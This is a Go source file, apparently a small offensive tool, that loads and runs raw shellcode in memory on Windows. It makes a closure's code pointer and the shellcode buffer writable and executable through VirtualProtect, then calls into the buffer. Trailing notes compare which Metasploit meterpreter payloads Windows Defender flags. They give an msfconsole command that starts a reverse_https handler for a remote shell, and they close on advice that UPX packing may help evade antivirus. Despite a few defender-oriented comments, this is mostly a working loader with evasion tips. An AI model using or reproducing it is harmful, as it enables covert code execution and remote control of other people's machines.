package shellcode

import (
	"syscall"
	"unsafe"
)

// procVirtualProtect lazily resolves kernel32!VirtualProtect by name at
// runtime via the LazyDLL/LazyProc mechanism rather than through the
// binary's import table. NOTE(review): runtime resolution of memory-protection
// APIs is itself an observable pattern for defenders.
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")

// VirtualProtect changes the protection of the region starting at lpAddress
// and spanning dwSize bytes to flNewProtect, storing the previous protection
// through lpflOldProtect. It returns true when the Win32 call returns a
// non-zero value. The second and third results of Call (the last-error value
// among them) are discarded, so callers receive no detail on why a call failed.
func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
	ret, _, _ := procVirtualProtect.Call(
		uintptr(lpAddress),
		uintptr(dwSize),
		uintptr(flNewProtect),
		uintptr(lpflOldProtect))
	return ret > 0
}

// Run executes the bytes in sc as native code in the current process.
//
// Mechanism, as the code below shows: an empty closure f is created; the word
// that f's function value points to (its code pointer) is made writable and
// executable (0x40 is PAGE_EXECUTE_READWRITE); that word is overwritten with the
// address of sc's backing array; the pages holding sc are likewise set to
// PAGE_EXECUTE_READWRITE; finally f() is invoked. Either VirtualProtect failure
// panics. Nothing restores the original protections afterwards.
//
// From a detection standpoint the two PAGE_EXECUTE_READWRITE transitions —
// one on the Go function value and one on a buffer that (presumably) the Go
// allocator never mapped executable — are the events an EDR hooking
// VirtualProtect would observe, together with execution from non-image memory.
func Run(sc []byte) {
	// TODO need a Go safe fork

	// Make a function ptr
	f := func() {}

	// Change permissions on f function ptr
	// The target address is the word f's function value points at, i.e. the
	// slot holding the closure's code pointer.
	var oldfperms uint32
	if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {
		panic("Call to VirtualProtect failed!")
	}

	// Override function ptr
	// *(*uintptr)(unsafe.Pointer(&sc)) reads the slice header's data pointer.
	**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))

	// Change permissions on shellcode string data
	var oldshellcodeperms uint32
	if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {
		panic("Call to VirtualProtect failed!")
	}

	// Call the function ptr it
	f()
}
At the time of writing the windows/x64/meterpreter/reverse_tcp payload was flagged by windows defender when executing (behavior analysis) but not the windows/x64/meterpreter/reverse_https
Starting the handler:
msfconsole -x "use exploit/multi/handler;\
set PAYLOAD windows/x64/meterpreter/reverse_https;\
set LHOST localhost;\
set LPORT 8443;\
run -j"
Packing the binary using UPX might help with Antivirus detection: